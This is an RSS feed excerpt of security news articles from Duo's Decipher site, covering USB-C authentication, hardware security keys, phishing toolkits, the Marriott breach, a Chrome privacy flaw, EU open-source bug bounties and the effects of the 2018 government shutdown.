Many operating systems used to open USB devices automatically, but that is no longer the default behavior because of the increased risks. As a result, many operating systems implicitly do not trust USB devices on the first run, and requires users to actively open the connection to the device. The USB Type-C Authentication Program will provide manufacturers and OEM vendors with a security framework based on the USB Type-C Authentication specification, originally unveiled in 2016 by the USB-IF and the USB 3.0 Promoter Group. The protocol supports authenticating over USB data bus or USB power delivery communications channels and enforces 128-bit security for all cryptographic methods. The protocol will also let products retain control over the security policies.

The specification outlines how host devices would confirm the authenticity of whatever is plugged into the USB port immediately, before any data or power transfer is made. The system will either block or permit the transfer of data or power, depending on the result of the validation check. It's not the host that can make the validation check—a charger can also authenticate a host, said Jeff Ravencraft, president and COO of USB-IF.

OEM vendors and manufacturers can create products that meet the specification so that the host system can use the protocol to perform the authentication checks. Certified devices will use 128-bit cryptographic-based authentication for certificate format, digital signing, hash and random number generation. Certificate authority DigiCert will provide and manage the public key infrastructure and the certificates used for the program. OEM and device manufacturers will contact DigiCert directly to set up their PKI operations and for certificate issance, and DigiCert will provision a signed intermediate CA.

A company can issue certificates, via our certificate program with DigiCert, that can then be embedded in their products giving their products a specific proof of identity and capabilities," said Ravencraft. "Companies' CA operations are rooted in the USB-IF CA.

At this point, the primary motivation for the program seems to be less about blocking attacks using malicious hardware, but rather addressing the problem of counterfeits. The approach will identify the product was actually made by the manufacturer, but may not have measurable impact attesting to the security of a given device. Windows exert Alex Ionescu was concerned that including the authentication functionaliy on the low-level could potentially introuce more bugs and increase the attack surface.

"Primary purpose is to fight counterfeits and help identify malicious or uncertified products," Ravencraft said.

The program opens up a lot of potential use cases for enterprises, such as being able to set security policies to restrict USB functions based on certificate status. For example, enterprises can set policy to allow allow phones to be charged only at public terminals that pass the validation check.

"[Enterprises] will be able to define a policy for dealing with products that have a certificate and those that don't," Ravencraft said.

However, for individual users, there is a risk that this program could become over-restrictive and impose a form of hardware DRM, making devices incompatible with other USB Type-C products in the market. The program is open-ended and leaves it up to the individual vendors on how to use the certification program. Vendors can use the program to also restrict support for only approved (certified) devices, such as being unable to use a cable from another brand. If the Samsung device needs its own Samsung cable as opposed to using the one from LG or a generic one purchased off Amazon, this would seriously impact useability. All exiisting cables would be unlikely to be certified, so users may be forced to swap out cables at some point.

“The intention of the program seems good, but there is certainly room for abuse," Joe Fedewa wrote over at XDA-Developers. "USB-C has been a promise of one standard connector for all devices. We’d hate to see that ruined by devices that won’t allow users to use perfectly safe 3rd-party accessories.”

Hardware manufacturers haven't said they will use the program to lock consumers into only using "supported" accessories, but the potential is there. USB-IF consists of representatives from manufacturers including Apple, HP, Intel and Microsoft, so these companies likely are working on these products. The program, which is ready to issue certificates, is currently optional for OEMs to participate in. There is time to see how the certification rules would evolve.

Image credit: Photo by Stefan Steinbauer on Unsplash

]]>
<![CDATA[Yubico Adds NFC-Enabled and Lightning Security Keys]]> dennis@decipher.sc (Dennis Fisher) https://duo.com/decipher/yubico-adds-nfc-enabled-and-lightning-security-key https://duo.com/decipher/yubico-adds-nfc-enabled-and-lightning-security-key Wed, 09 Jan 2019 00:00:00 -0500

The people holding off on enabling strong two-factor authentication on their various accounts are quickly running out of reasonable excuses. This week, that list got even shorter when Yubico launched an NFC-enabled hardware security key that works wirelessly, as well as a separate key with a Lightning port connector for Apple hardware.

The Security Key NFC is a modified version of the existing YubiKey, which has a single USB-A connector. The addition of the NFC (near field communication) capability allows people to use it with some Android mobile devices as well as some Windows laptops that have NFC readers attached. Like the other Yubico keys, the Security Key NFC supports both the FIDO2 and U2F (universal 2d factor) protocols for 2FA.

“With the option of multiple communication methods, this one key is able to deliver a simple and seamless user experience across multiple devices for strong multi-factor, two-factor (2FA), and single-factor passwordless authentication,” Ronnie Manning of Yubico said in a post.

With many people using their mobile devices as their main computing and communications platforms now, NFC-based 2FA is becoming a vital feature for hardware security keys. The current generation of USB-based keys work well for laptops and desktops, but generally aren’t usable with mobile devices. Yubico last year announced an integration of its NEO keys with iOS, but that required some work on the part of app developers.

The new Security Key NFC isn’t the lone option for NFC-based 2FA. Google sells its own Titan security key bundle, which includes an NFC key and a separate USB key. Those keys are mainly meant for use with Google’s own services, such as Google Cloud and its Advanced Protection Program, but also can be used on third-party services. An open-source alternative also exists, the Solo Key, and the team behind that project plans to have an NFC-enabled key available in the coming months, as well.

The other new key Yubico introduced at the Consumer Electronics Show this week has both a USB-C and a Lightning connector, enabling people to use it with both iOS devices and macBooks. Current MacBooks only have USB-C ports, so using a hardware security key requires an adapter. The YubiKey for Lightning eliminates that requirement, and also adds the ability to use it with iPhones and iPads.

Many popular services, including much of Google’s portfolio, Facebook, Twitter, some online banking apps, and others give users the ability to use U2F hardware keys for 2FA, and more sites are making the option available all the time. Hardware keys give users a strong defense against account-takeover and phishing attacks and are considered much more resilient to attack than SMS-based 2FA schemes.

]]>
<![CDATA[Phishing Frameworks and Toolkits Continue to Mature]]> dennis@decipher.sc (Dennis Fisher) https://duo.com/decipher/phishing-frameworks-and-toolkits-continue-to-mature https://duo.com/decipher/phishing-frameworks-and-toolkits-continue-to-mature Tue, 08 Jan 2019 00:00:00 -0500

Though it’s an old technique, phishing is still a major problem for many organizations, including those with sophisticated security teams and security aware users. APT groups and other high-level attackers often use highly credible, well-crafted phishing emails and sites to target victims, with notable success.

Two-factor authentication has become one of the major hurdles for groups using phishing to target valuable services. Understanding the tactics attackers use to try and bypass 2FA is important for both users and enterprise security teams, and this need has led to the rise of a wave of feature-rich phishing frameworks and tools for penetration testers.

Phishing toolkits have been around for many years, but many of them are custom tools developed internally by security consultancies, pen testing shops, and large enterprises with mature security teams. Many attack groups have their own versions, as well, optimized for their target industries and organizations. For various reasons, most of these tools don’t usually become public. So in recent years, security researchers and individual penetration testers have begun developing and releasing their own tools and frameworks to simulate phishing campaigns and help target users and organizations get a handle on the techniques and tricks attackers use in real campaigns.

One of the new entrants in this field is Modlishka, a reverse proxy designed to be a point-and-click tool for running phishing campaigns against any target domain. The tool allows a penetration tester to proxy traffic between a target user and the back-end server the user thinks she is communicating with. Modlishka allows an operator to intercept traffic from a user to a given site and gather credentials.

“All of the user’s traffic is handled of course over an encrypted browser trusted communication channel, where all of the relevant traffic is intercepted (such as credentials, authenticated session tokens, etc.) and the user is kept under the phishing domain, until a ’termination’ URL is triggered (it can be specified through the options),” Piotr Duszyński, the developer of Modlishka, said in an email to Decipher.

“In that moment the victim can be redirected to an arbitrary website and his access is restricted from accessing the phishing URL again. It is useful, for example, after the credentials have been collected. This tool is very flexible, in how the campaign should be carried out.”

"Currently the only resilient 2FA to this attack is based on U2F protocol."

Because the user’s traffic is proxied through Modlishka, the operator has the ability to intercept one-time codes and push notifications used in some 2FA schemes.

“All traffic, including cross domain HTTP/HTTPS calls are being proxied, which allows [you] to bypass all standard 2FA (TOTP, HOTP, Push based 2FA,etc.). Currently the only resilient 2FA to this attack is based on U2F protocol,” Duszyński said.

The Universal 2nd Factor standard relies on hardware security keys as the second factor in authentication operations, requiring the user to tap a key plugged into her computer. Some services, including Twitter, Facebook, and Google, offer users the ability to use U2F keys rather than SMS or other software-based 2FA mechanisms.

There a number of other tools in somewhat the same vein as Modlishka, including Evilginx2, a framework designed to phish session cookies and user credentials, and Judas, a standalone phishing proxy. There also are full-fledged phishing frameworks such as Gophish that allow operators to create templates and launch campaigns to see how aware users are of phishing techniques. Security consultants and penetration testers can be expensive, so open-source tools such as Gophish, Evilginx, and Modlishka can help organizations assess their level of awareness without laying out huge amounts of money.

“I created Gophish because I believe you shouldn't need a large security budget to measure your organization's exposure to phishing. My goal is to provide a high-quality phishing simulation framework that's quick to set up, easy to use, and has features that ‘just work’- all for free,” said Jordan Wright, the creator of Gophish and an R&D engineer at Duo Security.

]]>
<![CDATA[BlackBerry Turns Focus to IoT Security]]> dennis@decipher.sc (Dennis Fisher) https://duo.com/decipher/blackberry-turns-focus-to-iot-security https://duo.com/decipher/blackberry-turns-focus-to-iot-security Mon, 07 Jan 2019 00:00:00 -0500

In its short time on this earth, the Internet of Things has managed to accumulate a large number of nicknames, none of which is very flattering. Most of those epithets have something to do with IoT devices not being so secure. BlackBerry, the erstwhile mobile device maker, is hoping to change that state of affairs with a set of new software offerings to help IoT manufacturers build more secure software and hardware.

The rush in recent years to make every device under the sun Internet-enabled has led to some unfortunate security outcomes for users and manufacturers. Many hardware makers that are producing IoT devices may not have mature internal software security processes, especially manufacturers that are mainly focused on building consumer-grade devices. Priority tends to be given to getting devices into the marketplace as quickly and inexpensively as possible. Hardening the software and hardware against attacks takes considerable time and money.

BlackBerry is offering a new set of services that’s meant to take much of the security burden off of manufacturers by supplying hardware and software security support during both the manufacturing and development processes. There are three separate offerings, including one that provides manufacturers with a system to establish a hardware Root of Trust for devices, connected to the BlackBerry network operations center.

“During manufacturing, a BlackBerry Secure Identity Service Key is injected into the hardware and recorded on a secure server. Both at launch and periodically throughout the product’s lifecycle, checks are performed to verify that the two keys match. If they do not, the device no longer boots,” BlackBerry said.

“IoT device manufacturers can address security and privacy concerns head-on and stand out in the cluttered IoT space."

Another of the new services, the Secure Foundations Feature Pack, focuses on making the software in IoT devices more secure.

“In addition to hardening the operating system kernel, the Foundations Pack locks down software being executed with Secure Boot and ARM Trustzone technology to securely generate, use and store encryption keys used for various software operations. It also includes the BlackBerry Integrity Detection (BID) service which various components (kernel, Pathtrust, SELinux, etc) across the software stack, and generates real-time ‘health’ reports that can be accessed by users and trusted third-party applications,” the company said.

The first few generations of IoT devices have mostly consisted of products that were retrofitted with connectivity and other functionality. Newer devices are being designed from the beginning to be connected, but that hasn’t necessarily translated into better security. Researchers and attackers have had little trouble finding weaknesses in many IoT devices, including home automation systems, smart city devices, and vehicle infotainment and operation systems. The lack of security in many connected devices has emerged as a serious concern in recent years, and, if history is any guide, the road to secure development and manufacturing practices will be a long one.

“IoT device manufacturers can address security and privacy concerns head-on and stand out in the cluttered IoT space by bringing to market ultra-secure products that consumers, retailers, and enterprises want to buy and use,” Alex Thurber, senior vice president and general manager of mobility solutions at BlackBerry, said.

]]>
<![CDATA[Marriott Breach Included 5 Million Passport Numbers]]> dennis@decipher.sc (Dennis Fisher) https://duo.com/decipher/marriott-breach-included-5-million-stolen-passport-numbers https://duo.com/decipher/marriott-breach-included-5-million-stolen-passport-numbers Fri, 04 Jan 2019 00:00:00 -0500

When Marriott announced a huge data breach in November, the company estimated that about 500 million people were affected by the incident. After more than a month of investigation and forensics work, the company has lowered that number to about 383 million people, but also said that several million unencrypted passport numbers were taken during the breach.

The breach involved an intrusion into the Starwood reservations database dating back to 2014, but was only discovered in 2018. The attackers had access to a wide range of customer data, including names, home addresses, email addresses, and phone numbers. In some cases, customers’ payment card information, birthdates, and passport numbers.

“Marriott learned during the investigation that there had been unauthorized access to the Starwood network since 2014. The company recently discovered that an unauthorized party had copied and encrypted information, and took steps towards removing it. On November 19, 2018, Marriott was able to decrypt the information and determined that the contents were from the Starwood guest reservation database,” the Marriott statement from November says.

On Friday, Marriott officials said that the investigation into the compromise has revealed that more than five million plaintext passport numbers were accessed during the intrusion. Replacing a passport is much more time consuming and involved than replacing a payment card compromised in a breach, and passport numbers are quite valuable as unique identifiers. Marriott officials said the company is in the process of setting up a resource to allow customers to check whether their passport number was part of the breach.

“Marriott now believes that approximately 5.25 million unencrypted passport numbers were included in the information accessed by an unauthorized third party. The information accessed also includes approximately 20.3 million encrypted passport numbers. There is no evidence that the unauthorized third party accessed the master encryption key needed to decrypt the encrypted passport numbers,” Marriott’s new statement says.

“Marriott has identified approximately 383 million records as the upper limit."

In its initial disclosure in November, Marriott said that although the payment card data stolen was encrypted, it was possible that the attackers had accessed the key material needed to decrypt them. However, in the updated disclosure, Marriott officials said there is “no evidence that the unauthorized third party accessed either of the components needed to decrypt the encrypted payment card numbers.” The company also said that of the 8.6 million encrypted payment card numbers that were stolen, all but 354,000 of them were expired by September 2018.

As is often the case with data breaches, Marriott also revised the number of total records involved in the incident. But unlike most breaches, the number dropped, from approximately 500 million to fewer than 400 million.

“Marriott has identified approximately 383 million records as the upper limit for the total number of guest records that were involved in the incident. This does not, however, mean that information about 383 million unique guests was involved, as in many instances, there appear to be multiple records for the same guest. The company has concluded with a fair degree of certainty that information for fewer than 383 million unique guests was involved, although the company is not able to quantify that lower number because of the nature of the data in the database,” the company said.

The attackers behind the breach were able to get into the Starwood hotel chain reservation database in 2014. This occurred before Marriott and Starwood merged, and Marriott officials said the company has now taken the Starwood database offline and all reservations now flow through the Marriott system.

]]>
<![CDATA[Google Patches Old Chrome Flaw on Android That Disclosed Device Info]]> dennis@decipher.sc (Dennis Fisher) https://duo.com/decipher/google-patches-old-chrome-flaw-on-android-that-disclosed-device-info https://duo.com/decipher/google-patches-old-chrome-flaw-on-android-that-disclosed-device-info Thu, 03 Jan 2019 00:00:00 -0500

More than three years after a weakness in Chrome for Android that allows an attacker to discover the patch level, firmware version, and hardware model of a device was reported to Google, the company has released a partial fix that hides the firmware level but still doesn’t take care of the entire problem.

The issue stems from the way that the Chrome browser for Android sends information about the device and the software on it to web sites. Chrome, which is the default browser on Android devices, sends a specific set of information in the browser headers to any site a user visits. That information includes the User Agent string, which in turn includes the Android version number and build tag identifier. This is similar to the way that desktop browsers behave, sending information to sites to help them identify what type of browser and OS the user is running. The difference is the build number that Chrome on Android includes.

“The fact that it identifies the operating system and its version is not unique. This follows generally what many other browsers have been doing on desktop and mobile. It is the build tag that is the problem. As described above, the build tag identifies both the device name and its firmware build,” Yakov Shafranovich of Nighwatch Cybersecurity said in an advisory on the issue, published Dec. 25.

“For many devices, this can be used to identify not only the device itself, but also the carrier on which it is running and from that the country. It can also be used to determine which security patch level is on the device and which vulnerabilities the device is vulnerable to.”

For attackers, the build information and other data about the device can be quite valuable. That information can tell an attacker exactly what device model and patch level the user has, which the attacker can then use to decide how to attack that specific device. Many older Android devices have unpatched vulnerabilities that an attacker could target with the right information at hand.

Researchers at Nightwatch discovered the weakness and first reported it to Google in 2015. However, Google engineers said the issue was not a vulnerability and that it wouldn’t be fixed.

“This is [working as intended]. For webview, the client can override,” a Chromium engineer wrote in a response at the time of the initial bug report.

Three years later, a new bug was filed with Google and the company released a partial fix for the issue in Chrome 70 for Android in October. The update, which also applies to Chrome on iOS and the desktop, removes the firmware build information from the Chrome header, but the device’s model number is still there.

“All prior versions are believed to be affected. Users are encouraged to upgrade to version 70 or later. Since this fix doesn’t apply to WebView usage, app developers should manually override the User Agent configuration in their apps,” Shafranovich said.

One workaround for the issue is to go into the Chrome settings on Android and use the Desktop Site option.

]]>
<![CDATA[Deciphering Office Space]]> dennis@decipher.sc (Dennis Fisher) https://duo.com/decipher/deciphering-office-space https://duo.com/decipher/deciphering-office-space Wed, 02 Jan 2019 00:00:00 -0500

For anyone who has worked a thankless job for a tyrannical, ineffectual boss, Office Space touches a nerve. The story of a trio of programmers--Peter Gibbons, Michael Bolton, and Samir Nagheenanajar--at the faceless Initech in the late 1990s, Office Space mixes the existential dread of dead-end jobs with the illicit thrill of deciding to get back at your boss and everyone else. In this case, the revenge comes in the form of a virus that steals money from Initech and transfers it to Peter and his pals. Office Space is perhaps the quintessential tech industry comedy and set the stage for Silicon Valley nearly 20 years later. This is Deciphering Office Space.

]]>
<![CDATA[Open Source Software Needs Funding, Not Bug Bounty Programs]]> fahmida@decipher.sc (Fahmida Y. Rashid) https://duo.com/decipher/open-source-software-needs-funding-not-bug-bounty-programs https://duo.com/decipher/open-source-software-needs-funding-not-bug-bounty-programs Wed, 02 Jan 2019 00:00:00 -0500

While the European Union’s latest bug bounty program for widely used open source projects sounds like a step towards improving the security of the overall Internet ecosystem, these programs may wind up complicating efforts to secure these applications.

The European Union has committed to pay €850,000 (nearly $1 million) in bug bounties for vulnerabilities found in 15 open source projects as part of the edition of the Free and Open Source Software Audit (FOSSA) project, said Julia Reda, a member of the European Parliament representing the German Pirate Party. The projects are 7-zip, Apache Kafka, Apache Tomcat, Digital Signature Services (DSS), Drupal, Filezilla, FLUX TL, the GNU C Library (glibc), KeePass, midPoint, Notepad++, PuTTY, the Symfony PHP framework, VLC Media Player, and WSO2. Six of the projects will accept vulnerability reports until the summer, six until the end of the year, and three will accept reports through 2020. Drupal, a powerful content management system, and PuTTY, a terminal emulator, serial console and network file transfer application, have the largest amounts allocated under this program, at €89,000 ($101,000) and €90,000 ($102,000), respectively.

FOSSA was launched by Germany’s Reda and Max Andersson, member of Sweden’s Green Party in the European Parliament after researchers discovered the Heartbleed vulnerability in OpenSSL back in 2014. Heartbleed impacted SSL as well as other software the open source library provided functions to, resulting in many organizations scrambling to understand their exposure. The initial version of FOSSA created an inventory of all open source software used by the European Parliament and sponsored security audits for Apache HTTP web server and KeePass password manager. The second edition of FOSSA ran a bug bounty program on HackerOne for VLC Media Player.

However, the EU announcement highlights one of the main problems with bug bounties: the emphasis is on finding vulnerabilities, not fixing them. Developers already have a long list of vulnerabilities and bugs—bug hunters just make the list longer. Developers need the resources to be able to fix the issues. The way issues get fixed in open source software is also very different from closed-source and proprietary software, which also adds to the pressure on the project maintainer.

Only those who are responsible for fixing bugs should start bug bounties. (Katie Moussouris, Luta Security)

“The projects are already overworked, they don’t need a bunch of new bugs to fix,” Josh Bressers, who leads product security at Elastic, the company behind Elastic Stack (Elasticsearch, Kibana, Beats, and Logstash), wrote on Open Source Security.

Creating a Longer List

Organizations learn about flaws in their applications they otherwise would not know about through bug bounty programs, but that knowledge doesn’t help if the organizations don’t have a way to triage the incoming reports and fix the issues. Enterprises can decide to invest in developing that process. That isn’t always an option for open source projects—if they don’t have corporate sponsors—as they tend to be underfunded and rely heavily on volunteers. The projects that would benefit from having more people scrutinizing the codebase for flaws are also the projects that are hurt because they can’t readily shift resources to fix those same issues.

“I disagree that it's [bug bounty program] a good thing on its own. Where is the money for more paid maintainers?” Katie Moussouris, founder of Luta Security and expert in software vulnerability management, wrote on Twitter. “Oops. It's not there.”

Consider the case of Network Time Protocol (NTP), an open source protocol used to synchronize clocks on servers and devices to make sure they all have the same time. It is arguably one of the most important pieces of software in use, but back in 2016, the lack of financial support meant there were grave concerns over maintaining the software long-term. There was too much for principal engineer Harlan Stenn, as the sole maintainer, to do alone, but without a sponsor or more funding, hiring someone to help wasn’t an option. NTP currently gets funding from the Linux Foundation’s Core Infrastructure Initiative, and the Network Time Foundation, a non-profit Stenn established for NTP, lists several corporate donors on the site.

But imagine if there had been a bug bounty program for NTP around the time the project team was trying to figure out its financial future. It makes sense—since NTP is critical Internet infrastructure in every way that matters—but without additional funding, these flaws would have remained unfixed.

“A #bugbounty on open source projects that don’t get any funding for additional maintainers is likely to decimate the volunteer maintainer labor pipeline of the future,” Moussouris wrote.

One possibility is to require the finder to submit a working patch along with the vulnerability report, but Moussouris said that additional challenges for the maintainers. When the maintainers for Apache Server Core, who are named in this program, were asked if getting patches would be helpful, they "specifically said no empatically, since they already spend an inordinate amount of time arguing against patches that would introduce breaking changes," Moussouris said. "Tying bounty payout to this would increase their work."

Deployment Challenges

Bug bounty programs operate on the assumption that resources exist to resolve the issues that are found. That assumption plays out differently for open source software and commercial software. When the issue is found and responsibly disclosed to the vendor, the vendor has time to fix it within a time period. Within a certain time period, there is typically no public information about the flaw. With open source software, that vulnerability may be saved to a public tracking system such as Bugzilla or GitHub Issues. There may be discussion between developers on the best approach to fixing the flaw.

If there is a delay in fixing the issues—because there is only one person and only so many hours in a day—users are left vulnerable because anyone could use the public details and create exploits targeting those flaws.

Where is the money for more paid maintainers? Oops. It's not there.

“Any security issue disclosed in public leaves users vulnerable until a fix is found,” said Tim Mackey, senior technical evangelist at Black Duck by Synopsys.

Even if the developers fix the issue promptly, there remains the challenge of delivering the fix to all the users. Commercial software typically has a single release stream, so once the issue is addressed in that stream, all the users get the fix once they apply the update. In open source software, there are multiple release versions and branches, making it difficult to coordinate fixes in a way that all the branches pick up the updated code.

“This [delivering the fix] is by far the most significant hurdle for bug bounty-based efforts in [open source software],” Mackey said.

Funding For Fixers

Only those who are responsible for fixing bugs should start bug bounties," Moussouris said. "Else, you risk bug foie gras.

Bug bounty programs should be considered as part of a broader software management program, one that looks at how software is developed, maintained, and supported. The recent focus on bug bounty programs for open source projects doesn’t automatically lead to more secure software. These projects are chronically underfunded.

Tying bounty payout to this would increase their work.

“I would be happier had they also funded developers and security professionals to work with the communities creating their target applications,” Mackey said. That way, issues would be discovered and software could be improved at the same time.

There needs to be a framework that lets groups—governments, companies, and individuals—fund open source projects in a more sustainable manner.

Figuring out the “next step that will give the projects resources” will go further towards improving security than bug bounty programs, Bressers wrote. “Resources aren’t always money, sometimes it’s help, sometimes it’s gear, sometimes it’s pizza.”

This story was updated with additional comments posted on Twitter by Katie Moussouris.

]]>
<![CDATA[Government Shutdown Impacts Enterprise Security]]> fahmida@decipher.sc (Fahmida Y. Rashid) https://duo.com/decipher/government-shutdown-impacts-enterprise-security https://duo.com/decipher/government-shutdown-impacts-enterprise-security Mon, 31 Dec 2018 00:00:00 -0500

Editor's Note: This story has been updated.

While federal government shutdown has had an immediate effect on the hundreds of thousands of employees and contractors either furloughed or forced to work without pay, IT security teams outside of the government could potentially be affected as necessary public services become unavailable.

The partial shutdown began when funding for parts of the government ran out on Dec. 22, impacting more than a third of the federal employees working at departments including State, Justice, Treasury, Transportation, Interior, Agriculture, and Homeland Security. Nearly half of the affected 800,000 workers are working without pay—such as air traffic controllers and agents at airport security checkpoints—while the rest are furloughed. Who works and who stays home depends on which jobs are considered “essential.” That means many of the federal security workforce are exempt from the shutdown, especially those specialists responsible for security operations, monitoring networks, and defending systems against attacks.

While the Justice Department’s Justice Security Center is staying open and the Treasury Department identified computer security incident response and emergency operations staff as being essential, nearly 85 percent of the National Institute of Standards and Technology staff are furloughed. The fact that so much of NIST is closed would potentially impact the upcoming release dates for security standards and guidelines the agency has been working on, including the new risk management framework, changes to the federal government’s guidelines on security controls, and requirements to access controlled by unclassified information.

Even though NIST regulates federal agencies, corporate security teams use NIST standards as a baseline for their security programs. The NIST guidelines provide enterprises with actionable security best practices as well as detailed threat-mitigation strategies. The delay in releasing these guidelines will impact security teams at organizations waiting for these publications.

Also closed: the FIPS-validation sites Cryptographic Algorithm Validation Program and Cryptographic Module Validation Program, which means products can't undergo testing during this period. CMVP certifies products used by the federal government that collect, store, transfer, share and disseminate "sensitive, but not classified" information as meeting the requirements of meeting the requirements of FIPS 140-2. CAVP is the prerequisite.

Trying to keep networks and data safe and thwarting attacks when not at full-strength is risky, especially when no one can predict how long this state of affairs will last.

“At a minimum, agencies must avoid any threat to the security, confidentiality and integrity of the agency information and information systems maintained by or on behalf of the government," the Office of Management and Budget said in a memo released back in Jan. 19, 2018. “Agencies should maintain appropriate cybersecurity functions across all agency information technology systems, including patch management and security operations center (SOC) and incident response capabilities.”

Services Stay Open

Even though much of NIST’s work will be interrupted with the shutdown, several NIST services will stay open. During the shutdown period, a computer scientist and an IT specialist will maintain the National Vulnerability Database, 16 employees will manage NIST’s time servers, and an IT specialist will be at the National Cybersecurity Center of Excellence.

NVD is a repository of security checklists, software security vulnerabilities, and misconfigurations, and helps organizations understand and prioritize issues to mitigate. Outside of government, enterprises rely on the time servers to synchronize their infrastructure to have the same time so that they can look at transactions across systems, log events, and make sure tasks completed at the right time in the proper order.

“NIST time and frequency operations in Boulder, Ft. Collins, and Kauai are required to continue for reasons of national security (universal time coordination), national economy (e.g. Security Exchange Commission requirements), and national timing and synchronization infrastructure (e.g. millions of radio-controlled clocks),” said the Department of Commerce in its planning documents.

While much of the Small Business Administration will be closed, small businesses will be able to continue accessing security recommendations and guidance from the website. If small businesses have specific questions or need assistance with security matters, the National Cybersecurity and Communications Integration Center (NCCIS) service desk is open and accepting calls (as of Dec. 31).

All services of the National Technical Information Service will stay up and running.

At Reduced Capacity

It is an uncomfortable fact that the shutdown means the government’s security capabilities are reduced. The Department of Homeland Security’s newly-established Cybersecurity and Infrastructure Security Agency has 45 percent of employees furloughed. Approximately 45 percent of Homeland Security's analysis and operations team—which encompasses the Office of Intelligence and Analysis and the Office of Operations Coordination—is on furlough. I&A provides security intelligence to public and private sector partners and develops intelligence from those partners for DHS and the intelligence community.

Just because important services are available and security-related functions are up and running doesn’t mean there is nothing to worry about. The longer it takes for the government to reopen, the greater the chances that these agencies operating on short-term reserves may run out of cash on hand. At which point, they will be forced to shutter some of these services.

Security is challenging enough when fully-staffed and fully-funded. Trying to keep networks and data safe and thwarting attacks when not at full-strength is risky, especially when no one can predict how long this state of affairs will last.

Editor's Note: The original version of this story incorrectly referenced an older plan regarding the National Protection and Programs Directorate. When CISA was created in 2018, NPPD was reogranized into the new agency. The story has been updated to remove references to NPPD.

Header image credit: Photo by Marco Bianchetti on Unsplash

]]>